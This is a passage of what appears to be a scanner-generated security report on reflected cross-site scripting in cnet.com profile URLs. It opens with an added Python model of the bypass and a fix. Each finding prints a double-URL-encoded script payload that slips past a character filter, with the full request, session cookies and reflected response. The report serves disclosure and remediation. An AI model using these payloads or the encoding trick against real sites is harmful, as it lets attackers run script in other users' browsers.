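The bypass and the remediation described in this finding (and repeated in the findings for the other profile names below) are illustrated by the following added example. It is not code from the original report or from the application it describes. The blocklist is an assumption, since the report only says that "certain characters" are blocked; the two template fragments are taken from the reflection points shown in the responses; the plus-as-space behaviour mirrors the jim+kerstetter entry later in this section, which is reflected as "jim kerstetter"; and the profile-name allowlist is a hypothetical policy chosen for the example.

```python
import html
import re
from typing import Optional, Tuple
from urllib.parse import unquote, unquote_plus

# Assumed filter: the report only says "certain characters" are blocked, so this
# models the smallest blocklist that would stop a single-encoded payload.
BLOCKED = frozenset('<>"\'')

# Assumed allowlist for a canonical profile name (hypothetical policy).
PROFILE_NAME = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def render(profile_name: str) -> str:
    """The two reflection points shown in the report's responses: a double-quoted
    attribute value and element text.  The same template is used by the
    vulnerable and the hardened version; only what is substituted differs."""
    return (
        f'<input type="hidden" name="profileName" value="{profile_name}"/>\n'
        f"<li>{profile_name}'s community profile</li>"
    )


def decode_chain(raw_segment: str) -> Tuple[str, str]:
    """Return (value after the web server's decode, value after the application's
    redundant second decode).  The second decode uses unquote_plus because the
    report shows jim+kerstetter reflected as "jim kerstetter"."""
    once = unquote(raw_segment)
    twice = unquote_plus(once)
    return once, twice


def naive_filter_rejects(value: str) -> bool:
    """Blocklist check applied to the once-decoded value, where %3c is not <."""
    return any(c in BLOCKED for c in value)


def vulnerable_profile_page(raw_segment: str) -> Optional[str]:
    """Behaviour the report describes: validate, then decode again, then write
    the result into the page without output encoding."""
    once, twice = decode_chain(raw_segment)
    if naive_filter_rejects(once):
        return None  # request blocked by the filter
    return render(twice)


def encode_for_html(value: str) -> str:
    """Output encoding that is safe for both reflection points in render()."""
    return html.escape(value, quote=True)


def hardened_profile_page(raw_segment: str) -> Optional[str]:
    """One decode only (the web server's), the application's own plus-as-space
    convention applied before validation so that the canonical value is what
    gets checked, and HTML encoding at the output point regardless."""
    canonical = unquote(raw_segment).replace("+", " ")
    if not PROFILE_NAME.fullmatch(canonical):
        return None
    return render(encode_for_html(canonical))


if __name__ == "__main__":
    # Constructed from the first payload in this finding.
    payload = ("ericaatnews70c3f%2522%253e%253cscript%253ealert%25281%2529"
               "%253c%252fscript%253ed387a8463bf")
    once, twice = decode_chain(payload)
    print("after one decode :", once)
    print("after two decodes:", twice)
    print("vulnerable:", vulnerable_profile_page(payload))
    print("hardened  :", hardened_profile_page(payload))
    print("hardened  :", hardened_profile_page("jim+kerstetter"))
```

Running it shows the single-encoded form of the same payload being blocked while the double-encoded form passes the filter and lands in both reflection points; the hardened function rejects the payload at validation, and even a value that slipped past the allowlist would be neutralised by encode_for_html. html.escape is sufficient for double-quoted attribute values and element text, which are the two contexts in this report; it is not sufficient on its own for unquoted attributes, JavaScript blocks or URL contexts.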
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43502%253cscript%253ealert%25281%2529%253c%252fscript%253e9ef21427e95 was submitted in the REST URL parameter 2. This input was echoed as 43502<script>alert(1)</script>9ef21427e95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ericaatnews43502%253cscript%253ealert%25281%2529%253c%252fscript%253e9ef21427e95/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:19 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:20 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Length: 31104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<li>ericaatnews43502<script>alert(1)</script>9ef21427e95's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9003a%253cscript%253ealert%25281%2529%253c%252fscript%253e5de0aaf2877 was submitted in the REST URL parameter 2. This input was echoed as 9003a<script>alert(1)</script>5de0aaf2877 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ghaff9003a%253cscript%253ealert%25281%2529%253c%252fscript%253e5de0aaf2877/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:34 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:34 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=957
Connection: Keep-Alive
Content-Length: 30966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<li>ghaff9003a<script>alert(1)</script>5de0aaf2877's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfe8b4bb932 was submitted in the REST URL parameter 2. This input was echoed as fe0b9"><script>alert(1)</script>bfe8b4bb932 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ghafffe0b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfe8b4bb932/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:33 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:33 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=966
Connection: Keep-Alive
Content-Length: 31041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<input type="hidden" name="profileName" value="ghafffe0b9"><script>alert(1)</script>bfe8b4bb932"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5315a%253cscript%253ealert%25281%2529%253c%252fscript%253ec8b125a94b1 was submitted in the REST URL parameter 2. This input was echoed as 5315a<script>alert(1)</script>c8b125a94b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/harrisonh15315a%253cscript%253ealert%25281%2529%253c%252fscript%253ec8b125a94b1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:34 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:34 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=951
Connection: Keep-Alive
Content-Length: 31094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<li>harrisonh15315a<script>alert(1)</script>c8b125a94b1's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 324d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8fe572996d was submitted in the REST URL parameter 2. This input was echoed as 324d3"><script>alert(1)</script>e8fe572996d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/harrisonh1324d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8fe572996d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:32 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:32 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=955
Connection: Keep-Alive
Content-Length: 31066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<input type="hidden" name="profileName" value="harrisonh1324d3"><script>alert(1)</script>e8fe572996d"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc486%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6cd5eeb1 was submitted in the REST URL parameter 2. This input was echoed as bc486<script>alert(1)</script>bd6cd5eeb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jamesurquhartbc486%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6cd5eeb1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:33 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:33 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<li>jamesurquhartbc486<script>alert(1)</script>bd6cd5eeb1's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3d1020d085 was submitted in the REST URL parameter 2. This input was echoed as 7cebc"><script>alert(1)</script>b3d1020d085 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jamesurquhart7cebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3d1020d085/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:31 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:31 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Length: 31131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<input type="hidden" name="profileName" value="jamesurquhart7cebc"><script>alert(1)</script>b3d1020d085"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 930b3%253cscript%253ealert%25281%2529%253c%252fscript%253e4aaf9b515c9 was submitted in the REST URL parameter 2. This input was echoed as 930b3<script>alert(1)</script>4aaf9b515c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jbakalar930b3%253cscript%253ealert%25281%2529%253c%252fscript%253e4aaf9b515c9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:23 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:23 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=940
Connection: Keep-Alive
Content-Length: 31040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<li>jbakalar930b3<script>alert(1)</script>4aaf9b515c9's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfdf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb578f3e55 was submitted in the REST URL parameter 2. This input was echoed as 1dfdf"><script>alert(1)</script>bb578f3e55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jbakalar1dfdf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb578f3e55/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:21 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:21 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=989
Connection: Keep-Alive
Content-Length: 31097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<input type="hidden" name="profileName" value="jbakalar1dfdf"><script>alert(1)</script>bb578f3e55"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8ade%253cscript%253ealert%25281%2529%253c%252fscript%253e688f5566abe was submitted in the REST URL parameter 2. This input was echoed as a8ade<script>alert(1)</script>688f5566abe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jenguevina8ade%253cscript%253ealert%25281%2529%253c%252fscript%253e688f5566abe/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:26 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:26 GMT
Edge-Control: no-cache
